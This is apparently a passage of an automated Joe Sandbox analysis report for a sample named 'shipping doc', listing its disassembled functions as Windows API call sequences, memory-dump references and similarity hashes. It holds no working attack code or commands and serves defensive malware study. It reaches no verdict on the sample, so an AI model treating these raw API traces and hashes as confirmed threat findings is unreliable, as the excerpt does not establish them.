                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                              • String ID:
                                                                                              • API String ID: 3050599898-0
                                                                                              • Opcode ID: 9f5988f6bb121f2c2410960e27b74386cc9f7e65d129380d3b3873e688fbe409
                                                                                              • Instruction ID: 8ab90fa1329ed6f8f44baba31f6ec4417060aa608af92ede2712250951823103
                                                                                              • Opcode Fuzzy Hash: 9f5988f6bb121f2c2410960e27b74386cc9f7e65d129380d3b3873e688fbe409
                                                                                              • Instruction Fuzzy Hash: C141DD71104304AFD721DF24CC94FBA7BF8EB45324F100629FAA4876E2C7319885EB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0015080C
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00150847
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00150863
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 001508DC
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001508F3
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00150921
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3368777196-0
                                                                                              • Opcode ID: 885729cc38891b41d3fbf83baa1af2ba5c898f934d4da826edf226c56adb35e8
                                                                                              • Instruction ID: 9c3935a578734fa0fa42510ae9cd2f8b5e0ecdfa5add0e60d5f561f3c666ce15
                                                                                              • Opcode Fuzzy Hash: 885729cc38891b41d3fbf83baa1af2ba5c898f934d4da826edf226c56adb35e8
                                                                                              • Instruction Fuzzy Hash: 7A415B71900205EFDF159F94DC85AAA7778FF08310F1440A9ED04AE29BDB70DEA5DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0013F3AB,00000000,?,?,00000000,?,0013682C,00000004,00000000,00000000), ref: 0017824C
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00178272
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001782D1
                                                                                              • ShowWindow.USER32(00000000,00000004), ref: 001782E5
                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0017830B
                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0017832F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: 8e80219830e84c1ed3b992b13e5897778e2aad137a3c4b42bd72deb33bd46e0b
                                                                                              • Instruction ID: 805de5eea654859c96e169e24cc66a03c25b6bbf7fc488790e25b417af6f2cc7
                                                                                              • Opcode Fuzzy Hash: 8e80219830e84c1ed3b992b13e5897778e2aad137a3c4b42bd72deb33bd46e0b
                                                                                              • Instruction Fuzzy Hash: F641C530641644AFDB15CF14D89DBE47BF1FB0A715F198269E60C4B263CB31A881CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00144C95
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00144CB2
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00144CEA
                                                                                              • _wcslen.LIBCMT ref: 00144D08
                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00144D10
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00144D1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                              • String ID:
                                                                                              • API String ID: 72514467-0
                                                                                              • Opcode ID: eba9a683dc9c7e6b7d78e1d5b5b2fa9d4e4bec69ad0deef7f685b50e11a94575
                                                                                              • Instruction ID: 803c7ea3dfa414c06bf0b59f7109705f04cb1f00080730166624ffb755c5b2aa
                                                                                              • Opcode Fuzzy Hash: eba9a683dc9c7e6b7d78e1d5b5b2fa9d4e4bec69ad0deef7f685b50e11a94575
                                                                                              • Instruction Fuzzy Hash: 5F212672604204BBEB155B79AC89FBB7BACDF55750F10803DF909CA1A2EB61CC4092A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E3A97,?,?,000E2E7F,?,?,?,00000000), ref: 000E3AC2
                                                                                              • _wcslen.LIBCMT ref: 0015587B
                                                                                              • CoInitialize.OLE32(00000000), ref: 00155995
                                                                                              • CoCreateInstance.OLE32(0017FCF8,00000000,00000001,0017FB68,?), ref: 001559AE
                                                                                              • CoUninitialize.OLE32 ref: 001559CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 3172280962-24824748
                                                                                              • Opcode ID: 5f1ff0526886207370548622af6bbe69073108f6f1856a5690104778f2fa9f6a
                                                                                              • Instruction ID: ed07d01e6cbb9da83972e384ccb8a9d8f19d9da4136206859de10615fc46c5de
                                                                                              • Opcode Fuzzy Hash: 5f1ff0526886207370548622af6bbe69073108f6f1856a5690104778f2fa9f6a
                                                                                              • Instruction Fuzzy Hash: CBD17371608701DFC704DF25C494A6ABBE2EF89315F14885DF899AB362CB31EC49CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00140FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00140FCA
                                                                                                • Part of subcall function 00140FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00140FD6
                                                                                                • Part of subcall function 00140FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00140FE5
                                                                                                • Part of subcall function 00140FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00140FEC
                                                                                                • Part of subcall function 00140FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00141002
                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00141335), ref: 001417AE
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001417BA
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 001417C1
                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 001417DA
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00141335), ref: 001417EE
                                                                                              • HeapFree.KERNEL32(00000000), ref: 001417F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                              • String ID:
                                                                                              • API String ID: 3008561057-0
                                                                                              • Opcode ID: 02d629022997dc415823b51685d1e547983dc7837437c7148005470f9ee0652c
                                                                                              • Instruction ID: 82287c754a731f58c7369617288bfb2ea1831b1727e49efc3deecb3738e1004b
                                                                                              • Opcode Fuzzy Hash: 02d629022997dc415823b51685d1e547983dc7837437c7148005470f9ee0652c
                                                                                              • Instruction Fuzzy Hash: 5B118E32510205FFDB149FA4CC49BAE7BB9EB45366F104028F44597220D735A9C4CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001414FF
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00141506
                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00141515
                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00141520
                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0014154F
                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00141563
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                              • String ID:
                                                                                              • API String ID: 1413079979-0
                                                                                              • Opcode ID: 6d71d442aac232f7ca293f94bce3c2495a5cdbc7f3b10f2922f8c1f0d7af770b
                                                                                              • Instruction ID: edd6e766de4a39a124a0b9ca6b9689b88c4d76ccc50ea5d23c89d1548d6e2293
                                                                                              • Opcode Fuzzy Hash: 6d71d442aac232f7ca293f94bce3c2495a5cdbc7f3b10f2922f8c1f0d7af770b
                                                                                              • Instruction Fuzzy Hash: CB112972505209BBDF118F98DD49BDE7BB9EF49754F044019FA09A6060C3758EA0DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00103379,00102FE5), ref: 00103390
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0010339E
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001033B7
                                                                                              • SetLastError.KERNEL32(00000000,?,00103379,00102FE5), ref: 00103409
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: e275d60ad77b30d87dd09a79aa6ffcf0e8da4fc893a62809d9883398f3e23bcc
                                                                                              • Instruction ID: 8a1fa3ad26ad7435b6555b7d288481e53d3c29adb2f50afdb157531ceba60168
                                                                                              • Opcode Fuzzy Hash: e275d60ad77b30d87dd09a79aa6ffcf0e8da4fc893a62809d9883398f3e23bcc
                                                                                              • Instruction Fuzzy Hash: 65012432208311BEE62927747DC56672A9CFB263793200229F6B0882F0FFA24E815284
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00115686,00123CD6,?,00000000,?,00115B6A,?,?,?,?,?,0010E6D1,?,001A8A48), ref: 00112D78
                                                                                              • _free.LIBCMT ref: 00112DAB
                                                                                              • _free.LIBCMT ref: 00112DD3
                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,0010E6D1,?,001A8A48,00000010,000E4F4A,?,?,00000000,00123CD6), ref: 00112DE0
                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,0010E6D1,?,001A8A48,00000010,000E4F4A,?,?,00000000,00123CD6), ref: 00112DEC
                                                                                              • _abort.LIBCMT ref: 00112DF2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 0a672758ac7d7f19fbd20fe1c52218552733c4386c5b7661baeb462aaaebe6a8
                                                                                              • Instruction ID: 33dcbae1e23f7b4e309c64ab89d6621d922f525f63959890b9ca20b77c2dcdb5
                                                                                              • Opcode Fuzzy Hash: 0a672758ac7d7f19fbd20fe1c52218552733c4386c5b7661baeb462aaaebe6a8
                                                                                              • Instruction Fuzzy Hash: 70F0A9315446106BCA1E37B8FC06ADA15656BD2771B25043CF828925D5EF3488E152A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F9693
                                                                                                • Part of subcall function 000F9639: SelectObject.GDI32(?,00000000), ref: 000F96A2
                                                                                                • Part of subcall function 000F9639: BeginPath.GDI32(?), ref: 000F96B9
                                                                                                • Part of subcall function 000F9639: SelectObject.GDI32(?,00000000), ref: 000F96E2
                                                                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00178A4E
                                                                                              • LineTo.GDI32(?,00000003,00000000), ref: 00178A62
                                                                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00178A70
                                                                                              • LineTo.GDI32(?,00000000,00000003), ref: 00178A80
                                                                                              • EndPath.GDI32(?), ref: 00178A90
                                                                                              • StrokePath.GDI32(?), ref: 00178AA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                              • String ID:
                                                                                              • API String ID: 43455801-0
                                                                                              • Opcode ID: 8c940fa2ea4056c9a127ab699c216ddc47482d3ef068b0b9f7b2d711774ee0c1
                                                                                              • Instruction ID: af9c197eb5be5e4a3e24b6fadf895f3f404ba80c2e801a35f21fe51f35a62cc3
                                                                                              • Opcode Fuzzy Hash: 8c940fa2ea4056c9a127ab699c216ddc47482d3ef068b0b9f7b2d711774ee0c1
                                                                                              • Instruction Fuzzy Hash: 9311057604014CFFEB129F90DC88EAA7F6DEB08354F008026BA199A5A1C7719E95DFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00145218
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00145229
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00145230
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00145238
                                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0014524F
                                                                                              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00145261
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: eb9a1ddd0d02cce1cce12b8e3fc5e40ec1f93b21d83cb3a19585289546839c3b
                                                                                              • Instruction ID: 5ceb50033cb1879e80703e77f88dcd1c6ff7a8fadd3395fc6850ca19cb17d282
                                                                                              • Opcode Fuzzy Hash: eb9a1ddd0d02cce1cce12b8e3fc5e40ec1f93b21d83cb3a19585289546839c3b
                                                                                              • Instruction Fuzzy Hash: DE014F75E40718BBEB109BA59C49E5EBFB9EF48751F04406AFA08A7691D6709840CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000E1BF4
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 000E1BFC
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000E1C07
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000E1C12
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 000E1C1A
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 000E1C22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: aabe9c89f069a1ff2c2809b27e9ea0d5edb960881fc2925d8cc55deba32ed4dc
                                                                                              • Instruction ID: e03b68ce8a664efdfac3af10f58d73c37d6e1c1c9b717b5af4d76ab09cc64d67
                                                                                              • Opcode Fuzzy Hash: aabe9c89f069a1ff2c2809b27e9ea0d5edb960881fc2925d8cc55deba32ed4dc
                                                                                              • Instruction Fuzzy Hash: 370148B09027597DE3008F5A8C85A52FEA8FF19754F00411BA15C47A41C7B5A8A4CBE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0014EB30
                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0014EB46
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0014EB55
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0014EB64
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0014EB6E
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0014EB75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 839392675-0
                                                                                              • Opcode ID: 347aa783ca29a06e375f04b69bf4c0652a56168bf5c717540ae5e22e95fec1c7
                                                                                              • Instruction ID: d970a522575c185e5c3347a48ce429b42328ef1bcc0573309da4e21c34c13de5
                                                                                              • Opcode Fuzzy Hash: 347aa783ca29a06e375f04b69bf4c0652a56168bf5c717540ae5e22e95fec1c7
                                                                                              • Instruction Fuzzy Hash: 29F05E72240158BBE7215B629C4EEEF3E7CEFCAB11F00016CF605E1591E7A05A81CAF5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClientRect.USER32(?), ref: 00137452
                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00137469
                                                                                              • GetWindowDC.USER32(?), ref: 00137475
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00137484
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00137496
                                                                                              • GetSysColor.USER32(00000005), ref: 001374B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                              • String ID:
                                                                                              • API String ID: 272304278-0
                                                                                              • Opcode ID: 14db671bcd74e1a598a9e02c922ce4e03460950632f3a517e554ded4f285d545
                                                                                              • Instruction ID: c212186a85eb7ae79f4b20a657ef3746545406a621217e9c9114616253534d99
                                                                                              • Opcode Fuzzy Hash: 14db671bcd74e1a598a9e02c922ce4e03460950632f3a517e554ded4f285d545
                                                                                              • Instruction Fuzzy Hash: B2014B31504215EFEB616F64DC08BEABBB6FB04321F510168F91AA25A1CB312ED1AB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0014187F
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 0014188B
                                                                                              • CloseHandle.KERNEL32(?), ref: 00141894
                                                                                              • CloseHandle.KERNEL32(?), ref: 0014189C
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001418A5
